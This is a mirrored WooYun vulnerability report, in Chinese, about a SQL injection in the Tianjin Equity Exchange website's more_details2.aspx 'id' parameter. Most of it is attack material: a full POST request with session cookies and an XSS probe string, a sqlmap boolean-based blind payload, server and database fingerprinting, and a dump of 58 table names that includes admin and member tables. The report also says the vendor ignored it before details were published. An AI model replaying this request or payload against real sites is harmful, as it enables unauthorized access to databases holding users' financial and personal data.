乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-08: 厂商已经主动忽略漏洞,细节向公众公开
http://www.tjsoc.com/ 天津股权交易所
POST /web/more_details2.aspx HTTP/1.1Content-Length: 239Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.tjsoc.com:80/Cookie: ASP.NET_SessionId=u15m1orexefpacbuhkcihpg1; __utmt=1; __utma=219506396.1977036588.1443013104.1443013104.1443013104.1; __utmb=219506396.4.10.1443013104; __utmc=219506396; __utmz=219506396.1443013104.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); CheckCode=2206Host: www.tjsoc.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBwKx8fr0DgKP6PmbAQKO6PmbAQKN6PmbAQKU6PmbAQKT6PmbAQKS6PmbAdYjvuPyabQjbKNlUiXi%2bknsyjBSanbB8KATBc8XGvqZ&__VIEWSTATE=/wEPDwUKLTE3MTM5MTc2OGRkHIz6x5shuppo6oFYZzvrzpLemXO41QcBr0a5CqauJjk%3d&id=250
id参数
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBwKx8fr0DgKP6PmbAQKO6PmbAQKN6PmbAQKU6PmbAQKT6PmbAQKS6PmbAdYjvuPyabQjbKNlUiXi+knsyjBSanbB8KATBc8XGvqZ&__VIEWSTATE=/wEPDwUKLTE3MTM5MTc2OGRkHIz6x5shuppo6oFYZzvrzpLemXO41QcBr0a5CqauJjk=&id=250 AND 8395=8395---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005Database: dsc130059_db[58 tables]+-----------------------+| D99_Tmp || Delsen_Admin || Delsen_FeedBack || Delsen_Group || T_FAQ || T_StockCode || T_StockCode_simu || T_admin || T_application || T_article || T_article_class || T_consult || T_consult_class || T_data || T_declaration || T_display || T_filter_main || T_filter_sub || T_grand || T_infomation || T_infomation_class || T_infomation_simu || T_invest || T_link || T_marketData || T_members || T_news || T_notice || T_others || T_person || T_platform || T_platform_Class || T_qyzx || T_recruitment || T_supervise || T_superviseNews || T_supervise_class || T_sysPower || T_sysUsers || Table_Article || Table_Class || Table_JobCand || Table_Log_Sys || Table_Member || Table_ShopOrder || Table_ShopPoints || cmd1 || cmd2 || cmd_tmp || cmd_ww || pcguest || sysdiagrams || table_temp || tb_company || tb_company_Main_class || tb_company_Sub_class || tkhxx || tkhxxtemp |+-----------------------+
未能联系到厂商或者厂商积极拒绝